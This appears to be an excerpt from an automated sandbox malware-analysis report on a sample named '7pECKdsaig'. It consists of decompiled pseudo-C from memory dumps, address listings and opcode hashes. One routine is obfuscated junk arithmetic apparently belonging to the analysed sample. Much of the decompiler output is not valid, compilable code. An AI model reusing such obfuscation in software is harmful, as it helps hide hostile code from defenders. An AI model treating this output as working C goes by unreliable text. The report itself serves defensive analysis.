                            																													__eflags = _t307;
                            																													if(_t307 == 0) {
                            																														goto L95;
                            																													} else {
                            																														__eflags = _t370 - _t344 + _t307;
                            																														if(_t370 >= _t344 + _t307) {
                            																															goto L149;
                            																														} else {
                            																															goto L95;
                            																														}
                            																													}
                            																												}
                            																											}
                            																										}
                            																									}
                            																								}
                            																							}
                            																							goto L97;
                            																						}
                            																					}
                            																					goto L143;
                            																				}
                            																			}
                            																		}
                            																	} else {
                            																		__eflags = _v40 - _t307 + _t344;
                            																		if(_v40 >= _t307 + _t344) {
                            																			goto L150;
                            																		} else {
                            																			goto L75;
                            																		}
                            																	}
                            																}
                            															}
                            														}
                            														L97:
                            														 *[fs:0x0] = _v20;
                            														return _t211;
                            													}
                            												}
                            											}
                            										}
                            									} else {
                            										goto L46;
                            									}
                            								}
                            								goto L151;
                            							}
                            							_t288 = _v164;
                            							_t366 = 0xc0000135;
                            							goto L41;
                            						}
                            					}
                            				}
                            				L151:
                            			}

                            0x0172d70a
                            0x0172d70a
                            0x0172d701
                            0x0172d710
                            0x0172d710
                            0x0172d6c1
                            0x0172d6c1
                            0x0172d6c6
                            0x0177b36d
                            0x0177b36f
                            0x00000000
                            0x0177b375
                            0x0177b375
                            0x0177b375
                            0x00000000
                            0x0177b375
                            0x00000000
                            0x0172d6cc
                            0x0172d6d8
                            0x0172d6d8
                            0x0172d6d8
                            0x00000000
                            0x0172d6c6
                            0x0172d6bf
                            0x00000000
                            0x0172d6da
                            0x0172d6da
                            0x0172d716
                            0x0172d71b
                            0x0172d720
                            0x0172d726
                            0x0172d726
                            0x0172d72d
                            0x00000000
                            0x0172d733
                            0x0172d739
                            0x0172d742
                            0x0172d750
                            0x0172d758
                            0x0172d764
                            0x0172d776
                            0x0172d77a
                            0x0172d783
                            0x0172d928
                            0x0172d92c
                            0x0172d93d
                            0x0172d944
                            0x0172d94f
                            0x0172d954
                            0x0172d956
                            0x0172d95f
                            0x0172d961
                            0x0172d973
                            0x0172d973
                            0x0172d956
                            0x0172d944
                            0x0172d92c
                            0x0172d78b
                            0x0177b394
                            0x0172d791
                            0x0172d798
                            0x0177b3a3
                            0x0177b3bb
                            0x0177b3bb
                            0x0172d7a5
                            0x0172d866
                            0x0172d870
                            0x0172d892
                            0x0172d898
                            0x0172d89e
                            0x0172d8a0
                            0x0172d8a6
                            0x0172d8ac
                            0x0172d8ae
                            0x0172d8b4
                            0x0172d8b4
                            0x0172d8ae
                            0x0172d7a5
                            0x0172d78b
                            0x0172d7b1
                            0x0177b3c5
                            0x0177b3c5
                            0x0172d7c3
                            0x0172d7ca
                            0x0172d7e5
                            0x0172d7eb
                            0x0172d8eb
                            0x0172d8ed
                            0x00000000
                            0x0172d8f3
                            0x0172d8f3
                            0x0172d8f3
                            0x00000000
                            0x0172d8ed
                            0x0172d7cc
                            0x0172d7cc
                            0x0172d7d2
                            0x00000000
                            0x0172d7d4
                            0x0172d7d4
                            0x0172d7d7
                            0x0172d7df
                            0x0177b3d4
                            0x0177b3d9
                            0x0177b3dc
                            0x0177b3dc
                            0x0177b3df
                            0x0177b3e2
                            0x0177b468
                            0x0177b46d
                            0x0177b46f
                            0x0177b46f
                            0x0177b475
                            0x0172d8f8
                            0x0172d8f9
                            0x0172d8fd
                            0x0177b3e8
                            0x0177b3e8
                            0x0177b3eb
                            0x0177b3ed
                            0x00000000
                            0x0177b3ef
                            0x0177b3ef
                            0x0177b3f1
                            0x0177b3f4
                            0x0177b3fe
                            0x0177b404
                            0x0177b409
                            0x0177b40e
                            0x0177b410
                            0x0177b410
                            0x0177b414
                            0x0177b414
                            0x0177b41b
                            0x0177b420
                            0x0177b423
                            0x0177b425
                            0x0177b427
                            0x0177b42a
                            0x0177b42d
                            0x0177b42d
                            0x0177b42a
                            0x0177b432
                            0x0177b436
                            0x0177b438
                            0x0177b43b
                            0x0177b43b
                            0x0177b449
                            0x0177b44e
                            0x0177b454
                            0x0177b458
                            0x0177b458
                            0x0177b45d
                            0x00000000
                            0x0177b45d
                            0x0177b3ed
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0172d7df
                            0x0172d7d2
                            0x0172d7ca
                            0x0177b37c
                            0x0177b37e
                            0x0177b385
                            0x0177b38a
                            0x00000000
                            0x0177b38a
                            0x0172d742
                            0x0172d7f1
                            0x0172d7f8
                            0x0177b49b
                            0x0177b49b
                            0x0172d800
                            0x0172d837
                            0x0172d843
                            0x0172d845
                            0x0172d847
                            0x0172d84a
                            0x0172d84b
                            0x0172d84e
                            0x0172d857
                            0x0172d818
                            0x0172d824
                            0x0172d831
                            0x0177b4a5
                            0x0177b4ab
                            0x0177b4b3
                            0x0177b4b8
                            0x0177b4bb
                            0x00000000
                            0x0177b4c1
                            0x0177b4c1
                            0x0177b4c8
                            0x00000000
                            0x0177b4ce
                            0x0177b4d4
                            0x0177b4e1
                            0x0177b4e3
                            0x0177b4e5
                            0x00000000
                            0x0177b4eb
                            0x0177b4f0
                            0x0177b4f2
                            0x0172dac9
                            0x0172dacc
                            0x0172dacf
                            0x0172dad1
                            0x0172dd78
                            0x0172dd78
                            0x0172dcf2
                            0x00000000
                            0x0172dad7
                            0x0172dad9
                            0x0172dadb
                            0x00000000
                            0x00000000
                            0x0172dae1
                            0x0172dae1
                            0x0172dae4
                            0x0172dae6
                            0x0177b4f9
                            0x0177b4f9
                            0x0177b500
                            0x0172daec
                            0x0172daec
                            0x0172daf5
                            0x0172daf8
                            0x0172dafb
                            0x0172db03
                            0x0172db11
                            0x0172db16
                            0x0172db19
                            0x0172db1b
                            0x0177b52c
                            0x0177b531
                            0x0177b534
                            0x0172db21
                            0x0172db21
                            0x0172db24
                            0x0172dcd9
                            0x0172dce2
                            0x0172dce5
                            0x0172dd6a
                            0x0172dd6d
                            0x00000000
                            0x0172dd73
                            0x0177b51a
                            0x0177b51c
                            0x0177b51f
                            0x0177b524
                            0x00000000
                            0x0177b524
                            0x0172dce7
                            0x0172dce7
                            0x0172dce7
                            0x00000000
                            0x0172dce7
                            0x00000000
                            0x0172db2a
                            0x0172db2c
                            0x0172db31
                            0x0172db33
                            0x0172db36
                            0x0172db39
                            0x0172db3b
                            0x0172db66
                            0x0172db66
                            0x0172db3d
                            0x0172db3d
                            0x0172db3e
                            0x0172db46
                            0x0172db47
                            0x0172db49
                            0x0172db4c
                            0x0172db53
                            0x0172db55
                            0x0172db58
                            0x0172db5a
                            0x0177b50a
                            0x0177b50f
                            0x0177b512
                            0x0172db60
                            0x0172db60
                            0x0172db63
                            0x0172db63
                            0x00000000
                            0x0172db63
                            0x0172db5a
                            0x0172db3b
                            0x0172db24
                            0x0172db69
                            0x0172db69
                            0x0172db6c
                            0x0172db6f
                            0x0172db74
                            0x0177b557
                            0x0177b557
                            0x0177b55e
                            0x0172db7a
                            0x0172db7c
                            0x0172db7f
                            0x0172db82
                            0x0172db85
                            0x00000000
                            0x0172db8b
                            0x0172db8b
                            0x0172db8d
                            0x0172db9b
                            0x0172db9b
                            0x0172db9d
                            0x0172dba0
                            0x0172dba2
                            0x0172dba4
                            0x0172dba7
                            0x0172dba9
                            0x0172dbae
                            0x0172dbae
                            0x0172dbb1
                            0x0172dbb4
                            0x0172dbb4
                            0x0172dbb7
                            0x0172dbba
                            0x0172dcd2
                            0x0172dcd4
                            0x00000000
                            0x0172dbc0
                            0x0172dbc0
                            0x0172dbd2
                            0x0172dbd7
                            0x0172dbda
                            0x0172dbdd
                            0x0172dbdf
                            0x00000000
                            0x0172dbe5
                            0x0172dbe5
                            0x0172dbee
                            0x0172dbf1
                            0x0177b541
                            0x0177b544
                            0x00000000
                            0x0177b546
                            0x0177b546
                            0x00000000
                            0x0177b546
                            0x0172dbf7
                            0x0172dbf7
                            0x0172dbfd
                            0x0172dbfd
                            0x0172dbff
                            0x0172dc0b
                            0x0172dc15
                            0x0172dc1b
                            0x0172dc1d
                            0x0172dc21
                            0x0172dc21
                            0x0172dc23
                            0x0172dc23
                            0x0172dc26
                            0x0172dc29
                            0x0172dc2b
                            0x00000000
                            0x00000000
                            0x0172dc31
                            0x0172dc34
                            0x0172dc36
                            0x0172dcbf
                            0x0172dcbf
                            0x0172dcc2
                            0x00000000
                            0x0172dc3c
                            0x0172dc41
                            0x0172dc43
                            0x00000000
                            0x0172dc45
                            0x0172dc45
                            0x0172dc47
                            0x00000000
                            0x0172dc4d
                            0x0172dc4d
                            0x0172dc50
                            0x0172dc52
                            0x0172dc55
                            0x0172dcfa
                            0x0172dcfe
                            0x0172dd08
                            0x0172dd0a
                            0x0172dd0c
                            0x00000000
                            0x0172dd12
                            0x0172dd15
                            0x0172dd2d
                            0x0172dd2f
                            0x0172dd32
                            0x0172dd35
                            0x00000000
                            0x0172dd35
                            0x0172dc5b
                            0x0172dc5b
                            0x0172dc5e
                            0x0172dc61
                            0x0172dc64
                            0x0172dc67
                            0x0172dc67
                            0x0172dc6a
                            0x0172dc6c
                            0x0172dc8e
                            0x0172dc8e
                            0x0172dc91
                            0x0172dc93
                            0x0172dcce
                            0x0172dcce
                            0x0172dc95
                            0x0172dc9c
                            0x0172dc6e
                            0x0172dc72
                            0x0172dc75
                            0x0172dc77
                            0x0172dc79
                            0x0177b551
                            0x0177b551
                            0x00000000
                            0x0172dc7f
                            0x0172dc7f
                            0x0172dc81
                            0x00000000
                            0x0172dc83
                            0x0172dc86
                            0x0172dc88
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0172dc88
                            0x0172dc81
                            0x0172dc79
                            0x0172dc6c
                            0x0172dc55
                            0x0172dc47
                            0x0172dc43
                            0x00000000
                            0x0172dc36
                            0x0172dc23
                            0x00000000
                            0x0172dbff
                            0x0172dbf1
                            0x0172dbdf
                            0x0172db8f
                            0x0172db92
                            0x0172db95
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0172db95
                            0x0172db8d
                            0x0172db85
                            0x0172db74
                            0x0172dc9f
                            0x0172dca2
                            0x0172dcb0
                            0x0172dcb0
                            0x0172dad1
                            0x0177b4e5
                            0x0177b4c8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0172d831
                            0x00000000
                            0x0172d800
                            0x0177b47f
                            0x0177b485
                            0x00000000
                            0x0177b485
                            0x0172d665
                            0x0172d652
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 87f863c49830eea701379bdbc07417852c93f88e47be77196a92e6da74f6cb5d
                            • Instruction ID: df50a2c6ae94afca95b5bb501305773358884c0e5d6c9d8a5bd886c02ec01b64
                            • Opcode Fuzzy Hash: 87f863c49830eea701379bdbc07417852c93f88e47be77196a92e6da74f6cb5d
                            • Instruction Fuzzy Hash: 8BE1BE30A0176A8FEB35CF68C894BA9FBB2BF45304F0501E9D90997395D774AA82CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E00A9ED31() {
                            				void* _t23;
                            				intOrPtr _t26;
                            				signed int _t27;
                            				signed int _t28;
                            				signed int _t30;
                            				signed char _t32;
                            				signed char _t35;
                            				signed char _t37;
                            				signed char _t40;
                            				intOrPtr _t43;
                            				signed int _t44;
                            				intOrPtr _t46;
                            				signed int _t51;
                            				void* _t52;
                            				signed int _t54;
                            				signed int _t55;
                            				void* _t56;
                            				signed int _t61;
                            				intOrPtr _t66;
                            
                            				asm("rcr dword [0x4c03d425], 0x8e");
                            				 *0xb1c69c27 =  *0xb1c69c27 ^ _t40;
                            				 *0x46848430 =  *0x46848430 - _t23;
                            				_t30 = _t28 ^ 0x49b42ae9 ^  *0xc0a815cd;
                            				_t54 = _t52 + 0x00000001 ^ 0xa026b22b;
                            				 *0xa0f0968a =  *0xa0f0968a << 0x11;
                            				 *0xaaf79533 =  *0xaaf79533 - _t54;
                            				asm("cmpsw");
                            				if((_t40 ^  *0x9ced7230) <= 0) {
                            					__ebx =  *0xd14eb17f * 0x5453;
                            					asm("sbb dl, 0x88");
                            					__ch = __ch ^ 0x000000b5;
                            					__eax = __eax |  *0xe00530e;
                            					asm("adc [0xa0a109bb], edx");
                            					__eax = __eax + 0xce6a1719;
                            					__eflags =  *0xc629891c - __bl;
                            					asm("ror dword [0x1bf9ebf], 0x6");
                            					__esi =  *0x86a858e;
                            					 *0x4b23bfdc =  *0x4b23bfdc << 0xe1;
                            					 *0xa646121a =  *0xa646121a ^ __dl;
                            					asm("rcl dword [0x57f54ca9], 0xfb");
                            					 *0xe052b496 =  *0xe052b496 << 0xd0;
                            					asm("scasd");
                            					__edi = __edi &  *0x21558dcc;
                            					__edx =  *0xba81f36a * 0xbff9;
                            					 *0x98cb488d = 0x5f162dfd;
                            					__esi =  *0x86a858e &  *0x14491b1e;
                            					 *0x453e31bb =  *0x453e31bb | __edi;
                            					__ebp = __ebp | 0x0af82c37;
                            					 *0x46a2f9 =  *0x46a2f9 ^ __bh;
                            					__esp = __esp ^  *0x59039fdd;
                            					__dl = __dl |  *0x132bd886;
                            					__esi = ( *0x86a858e &  *0x14491b1e) - 1;
                            					asm("adc esp, [0x9a396dd6]");
                            					L1();
                            					 *0xae0b41e8 =  *0xae0b41e8 >> 0x86;
                            					__ah = __ah &  *0xe822d938;
                            					__edi = __edi ^  *0x811a781d;
                            					asm("sbb [0x2987f91f], ebx");
                            					__eflags =  *0x19c0220c - __al;
                            					 *0xf724e1ef =  *0xf724e1ef << 0xba;
                            					_push( *0x2adeea97);
                            					__eflags =  *0xbea64ac4 & __esi;
                            					__esp = __esp - 1;
                            					__ebp = __ebp |  *0xaf2c50bc;
                            					__bl = __bl + 0x18;
                            					__ebx =  *0xd14eb17f * 0x00005453 |  *0x73e8cbff;
                            					asm("sbb [0xf8b7a997], esi");
                            					__eax = __eax +  *0x2857556d;
                            					__eflags = __esp -  *0x4759429f;
                            					 *0x86555e83 =  *0x86555e83 - __esi;
                            					__ecx - 0x4389f337 =  *0xdb803d6f & __esi;
                            					asm("ror byte [0x2ee43524], 0xc7");
                            					 *0xcba3c6e1 =  *0xcba3c6e1 << 0xc9;
                            					 *0x49c6eeb3 & __dh =  *0xbbb36323 - ( *0xd14eb17f * 0x00005453 |  *0x73e8cbff);
                            					 *0xba81f36a * 0xbff9 - 1 =  *0xba81f36a * 0xbff9 - 1 +  *0x9be0d562;
                            					__esi = __ecx;
                            					 *0x5fba2c6f =  *0x5fba2c6f << 0x55;
                            					__edx =  *0xa05b0711;
                            					__ebp = __ebp & 0x51e0672d;
                            					__eax = __eax + 1;
                            					__esp = __esp - 1;
                            					__ah = __ah &  *0xd7c00388;
                            					__eflags = __ah;
                            					if(__ah > 0) {
                            						__ebp =  *0xd8fd127e * 0x98a5;
                            						asm("movsw");
                            						__ecx =  *0xe51bb16a * 0xd13a;
                            						__ebx =  *0xd082b76b * 0xdec4;
                            						__edx =  *0x49f524d4;
                            						__eflags = __ebp & 0x5937c691;
                            						__eax = __eax - 1;
                            						 *0x3ca1e1ff =  *0x3ca1e1ff + __eax;
                            						 *0xba8f20a2 =  *0xba8f20a2 >> 0xf6;
                            						 *0xcc89d01b =  *0xcc89d01b << 0x4b;
                            						asm("sbb ch, [0xea1c7388]");
                            						__eflags = __edx - 0xfe27f389;
                            						 *0xf5eab60c =  *0xf5eab60c >> 0xcc;
                            						__edx = __edx &  *0xb0b6a23f;
                            						asm("adc ecx, [0x49d1719f]");
                            						__ebp = __ebp &  *0x897216dc;
                            						__eflags = __ebp;
                            						if(__ebp >= 0) {
                            							_t17 = __ecx;
                            							__ecx =  *0xe05dd370;
                            							 *0xe05dd370 = _t17;
                            							__eax = __eax - 1;
                            							asm("rcr dword [0x88413966], 0x1b");
                            							 *0xf1940286 =  *0xf1940286 & __ch;
                            							 *0x3d123137 =  *0x3d123137 + __esp;
                            							 *0x220a7262 = __edx;
                            							__esp =  *0xdaf2be83;
                            							__ecx =  *0xe05dd370 ^  *0xa5640685;
                            							asm("adc [0xfb5c4e33], edx");
                            							asm("adc [0xfc3f36b9], ebx");
                            							 *0xb31e16e =  *0xb31e16e - __edx;
                            							__eax = __eax | 0xf9501b89;
                            							__edi = __edi - 0x10906165;
                            							__ah =  *0x88542d02;
                            							__esp =  *0xdaf2be83 ^ 0xa68239fa;
                            							 *0x5a70a88e =  *0x5a70a88e | __esp;
                            							__edx = __edx + 1;
                            							__bl = __bl |  *0x27c5338;
                            							__edi = __edi - 0x59d6ae29;
                            							asm("sbb esp, [0xaa8d3e94]");
                            							 *0x64fa3c4 = __ebx;
                            							asm("movsw");
                            							 *0x9654b3da =  *0x9654b3da << 0x5e;
                            							__eax = __eax +  *0xcce07009;
                            							 *0x73b7e8c6 =  *0x73b7e8c6 >> 0xb;
                            							__eflags =  *0xf4912bbf & __ebp;
                            							 *0xf75c8acd =  *0xf75c8acd & __eax;
                            							asm("adc [0x5d427b1e], esi");
                            							__al = __al ^  *0x1138c5e1;
                            							asm("ror dword [0x71427fd1], 0x3c");
                            							__ebp = 0x2d276407;
                            							asm("adc ebp, [0x60e6f46d]");
                            							__ebx =  *0xa170fc69 * 0x66f4;
                            							__ecx =  *0xe05dd370 ^  *0xa5640685 |  *0xffb6c60d;
                            							__edi = __eax;
                            							__esp =  *0xef5784c1;
                            							__eflags = __ecx -  *0xea4cfb93;
                            							__eflags =  *0x11ed7c20 & __cl;
                            							asm("rol dword [0x9e17a28e], 0xec");
                            							_pop(ss);
                            							asm("sahf");
                            							asm("in al, dx");
                            							if(__eflags < 0) {
                            								 *0x742f6373 =  *0x742f6373 ^ __eax;
                            								__esp = __esp ^  *0xc09852a9;
                            								__eflags = __esp;
                            								if(__esp == 0) {
                            									__edx = __edx | 0x2f66d27b;
                            									asm("cmpsw");
                            									asm("sbb [0xea869c65], esp");
                            									asm("rcr dword [0xeed9d0fc], 0x8d");
                            									asm("scasb");
                            									_push(__ecx);
                            									asm("rcl dword [0x39b5c33f], 0xea");
                            									__ecx = __ecx &  *0x86d2692;
                            									__bh = __bh | 0x000000a0;
                            									asm("adc eax, 0x8c31df8f");
                            									__cl = __cl +  *0x91607918;
                            									__eflags = 0x2d276407 - 0x7899f331;
                            									 *0x5ab5c3e6 =  *0x5ab5c3e6 >> 0x93;
                            									asm("rcl byte [0xf5b4efb1], 0x8c");
                            									 *0x8dd1432e =  *0x8dd1432e >> 0xfd;
                            									__eflags =  *0x8dd1432e;
                            									asm("adc bh, 0x30");
                            									if( *0x8dd1432e >= 0) {
                            										asm("ror dword [0x1a5f3578], 0x6");
                            										__ebp = 0x2d276408;
                            										__cl = __cl &  *0xaa96bc20;
                            										__eflags = __esp -  *0x5e0ceef7;
                            										asm("sbb bh, [0x3ccaad86]");
                            										 *0x65f5ef92 =  *0x65f5ef92 >> 0xc1;
                            										__edx = __edx ^  *0xc39da5f3;
                            										_push(__eax);
                            										 *0xe181b9d3 =  *0xe181b9d3 >> 0x2c;
                            										__esi =  *0x2b15a86a * 0x1fb7;
                            										__ebx = __ebx ^  *0xa1dbe9c;
                            										__ebx = __ebx - 1;
                            										__eflags = __bh & 0x0000001c;
                            										_push( *0x5f1b2867);
                            										if(__eflags == 0) {
                            											 *0xde6b6775 =  *0xde6b6775 >> 0xc2;
                            											if(__eflags < 0) {
                            												__eflags = __ebx -  *0xb29e7771;
                            												if(__ebx >=  *0xb29e7771) {
                            													__eax =  *0xb97597c * 0x16f1;
                            													__edi = __edi - 0xeb9fcfc;
                            													__ebx = __ebx - 0x8fc792fe;
                            													 *0x917bfd2 =  *0x917bfd2 >> 0x76;
                            													__eflags =  *0x917bfd2;
                            													if( *0x917bfd2 >= 0) {
                            														__ecx = __ecx +  *0x8e8f8478;
                            													}
                            												}
                            											}
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				L1:
                            				_t30 = _t30 +  *0xae3748ca;
                            				_t43 =  *0xf28ea5e2;
                            				 *0xf28ea5e2 =  *0x90760ce5;
                            				_t32 = (_t32 & 0x00000034 |  *0xaa96a0e) &  *0x560b30f4;
                            				if(_t32 > 0) {
                            					asm("adc ah, 0x8a");
                            					asm("adc dh, 0x82");
                            					asm("adc eax, 0x64378c29");
                            					_t35 = _t32 &  *0x7663bc3f;
                            					asm("sbb [0xd5ec522c], al");
                            					_push( *0x544ac0e);
                            					 *0x13b01a6d =  *0x13b01a6d ^ _t35;
                            					 *0x71978982 =  *0x71978982 - _t43;
                            					asm("sbb [0x74e09d3b], ecx");
                            					_t32 = _t35 ^ 0x0000001a;
                            					_t30 = _t30 & 0x0c010076 &  *0x6214a791;
                            					_t44 = _t43 + 1;
                            					_t61 = _t44;
                            					if(_t61 != 0) {
                            						_t26 =  *0xf5d59e74;
                            						asm("lodsb");
                            						_push(_t51);
                            						if(_t61 < 0) {
                            							 *0x892ff771 =  *0x892ff771 | _t55;
                            							 *0x2f1d94b9 =  *0x2f1d94b9 | _t51;
                            							_t32 = _t32 & 0x1a738deb;
                            							asm("rcl dword [0xd23ede89], 0xe9");
                            							_t27 = _t26 + 0xaf6e0b0f;
                            							_t46 = (_t44 |  *0x48708039) - 1;
                            							 *0xdab24fd5 = _t55;
                            							if(_t46 >= 0) {
                            								 *0xc6a36572 =  *0xc6a36572 << 0x66;
                            								_push( *0xd95274a3);
                            								_push( *0xe5d84afb);
                            								 *0xcdf8b2d3 = _t32;
                            								 *0x7edf7cb8 =  *0x7edf7cb8 + _t56;
                            								asm("rcr dword [0x457feedb], 0x5c");
                            								 *0xa1780add = _t46;
                            								asm("adc edi, 0x1894d2bf");
                            								_t32 =  *0xcdf8b2d3 |  *0xf30877d2;
                            								asm("sbb [0xe8d3a89a], ecx");
                            								 *0xa91b81e1 =  *0xa91b81e1 + ( *0xa1780add -  *0xc44023e7 & 0xb1f4773b);
                            								_t66 =  *0xa91b81e1;
                            								_t30 =  *0x1ca482e5;
                            								if(_t66 > 0) {
                            									_t55 =  *0xcd5b6476;
                            									if(_t66 < 0) {
                            										_push( *0x2f1cd873);
                            										 *0x1f629199 =  *0x1f629199 << 0x6c;
                            										_pop(_t37);
                            										_t54 = _t54 - 1;
                            										 *0x9a6fb4fc =  *0x9a6fb4fc | _t27;
                            										_push( *0x781951c5);
                            										asm("adc edi, 0xe674c319");
                            										_push( *0xc5d44060 * 0xced);
                            										_t51 = _t51 |  *0x8a3c711b;
                            										asm("adc [0x1e0c1527], esi");
                            										asm("sbb edx, 0x4b544a6c");
                            										asm("adc [0xbcb4bda8], ch");
                            										asm("adc esi, 0x8656dfd8");
                            										_t32 =  *0x1866f9fd;
                            										 *0x1866f9fd = (_t37 & 0x00000032) -  *0xb8cee96c;
                            										_t56 = _t56 +  *0xb5ec9c66;
                            										 *0xcd9412c6 = _t27;
                            										if(_t56 >= 0) {
                            											_t54 =  *0xd383e07c * 0x4a6b;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				goto L1;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 990e49573389d1f8a335b98ace9c1dd6e5c4840bc66f35afdf96696ad82db2b0
                            • Instruction ID: 04944cfbca4f5f0a076399dc3db8f28902cfb4fe344ef846600c501f0bb6f3db
                            • Opcode Fuzzy Hash: 990e49573389d1f8a335b98ace9c1dd6e5c4840bc66f35afdf96696ad82db2b0
                            • Instruction Fuzzy Hash: 71D18532A18781CFDB16CF35D89A7913FF5F752324708869EC4A2875A2DB341926CF89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E0174513A(intOrPtr __ecx, void* __edx) {
                            				signed int _v8;
                            				signed char _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				char _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				signed int _v40;
                            				intOrPtr _v44;
                            				intOrPtr _v48;
                            				char _v63;
                            				char _v64;
                            				signed int _v72;
                            				signed int _v76;
                            				signed int _v80;
                            				signed int _v84;
                            				signed int _v88;
                            				signed char* _v92;
                            				signed int _v100;
                            				signed int _v104;
                            				char _v105;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t157;
                            				signed int _t159;
                            				signed int _t160;
                            				unsigned int* _t161;
                            				intOrPtr _t165;
                            				signed int _t172;
                            				signed char* _t181;
                            				intOrPtr _t189;
                            				intOrPtr* _t200;
                            				signed int _t202;
                            				signed int _t203;
                            				char _t204;
                            				signed int _t207;
                            				signed int _t208;
                            				void* _t209;
                            				intOrPtr _t210;
                            				signed int _t212;
                            				signed int _t214;
                            				signed int _t221;
                            				signed int _t222;
                            				signed int _t226;
                            				intOrPtr* _t232;
                            				signed int _t233;
                            				signed int _t234;
                            				intOrPtr _t237;
                            				intOrPtr _t238;
                            				intOrPtr _t240;
                            				void* _t245;
                            				signed int _t246;
                            				signed int _t247;
                            				void* _t248;
                            				void* _t251;
                            				void* _t252;
                            				signed int _t253;
                            				signed int _t255;
                            				signed int _t256;
                            
                            				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                            				_v8 =  *0x180d360 ^ _t255;
                            				_v32 = _v32 & 0x00000000;
                            				_t251 = __edx;
                            				_t237 = __ecx;
                            				_t212 = 6;
                            				_t245 =  &_v84;
                            				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                            				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                            				_v48 = __ecx;
                            				_v36 = _t207;
                            				_t157 = memset(_t245, 0, _t212 << 2);
                            				_t256 = _t255 + 0xc;
                            				_t246 = _t245 + _t212;
                            				if(_t207 == 2) {
                            					_t247 =  *(_t237 + 0x60);
                            					_t208 =  *(_t237 + 0x64);
                            					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                            					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                            					_v104 = _t159;
                            					_v76 = _t159;
                            					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                            					_v100 = _t160;
                            					_v72 = _t160;
                            					L19:
                            					_v80 = _t208;
                            					_v84 = _t247;
                            					L8:
                            					_t214 = 0;
                            					if( *(_t237 + 0x74) > 0) {
                            						_t82 = _t237 + 0x84; // 0x124
                            						_t161 = _t82;
                            						_v92 = _t161;
                            						while( *_t161 >> 0x1f != 0) {
                            							_t200 = _v92;
                            							if( *_t200 == 0x80000000) {
                            								break;
                            							}
                            							_t214 = _t214 + 1;
                            							_t161 = _t200 + 0x10;
                            							_v92 = _t161;
                            							if(_t214 <  *(_t237 + 0x74)) {
                            								continue;
                            							}
                            							goto L9;
                            						}
                            						_v88 = _t214 << 4;
                            						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                            						_t165 = 0;
                            						asm("adc eax, [ecx+edx+0x7c]");
                            						_v24 = _t165;
                            						_v28 = _v40;
                            						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                            						_t221 = _v40;
                            						_v16 =  *_v92;
                            						_v32 =  &_v28;
                            						if( *(_t237 + 0x4e) >> 0xf == 0) {
                            							goto L9;
                            						}
                            						_t240 = _v48;
                            						if( *_v92 != 0x80000000) {
                            							goto L9;
                            						}
                            						 *((intOrPtr*)(_t221 + 8)) = 0;
                            						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                            						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                            						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                            						_t226 = 0;
                            						_t181 = _t251 + 0x66;
                            						_v88 = 0;
                            						_v92 = _t181;
                            						do {
                            							if( *((char*)(_t181 - 2)) == 0) {
                            								goto L31;
                            							}
                            							_t226 = _v88;
                            							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                            								_t181 = E0175D0F0(1, _t226 + 0x20, 0);
                            								_t226 = _v40;
                            								 *(_t226 + 8) = _t181;
                            								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                            								L34:
                            								if(_v44 == 0) {
                            									goto L9;
                            								}
                            								_t210 = _v44;
                            								_t127 = _t210 + 0x1c; // 0x1c
                            								_t249 = _t127;
                            								E01732280(_t181, _t127);
                            								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                            								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                            								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                            									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                            								}
                            								_t189 = L01734620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                            								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                            								if(_t189 != 0) {
                            									 *((intOrPtr*)(_t189 + 8)) = _v20;
                            									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                            									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                            									 *_t232 = _t232 + 0x10;
                            									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                            									E0175F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                            									_t256 = _t256 + 0xc;
                            								}
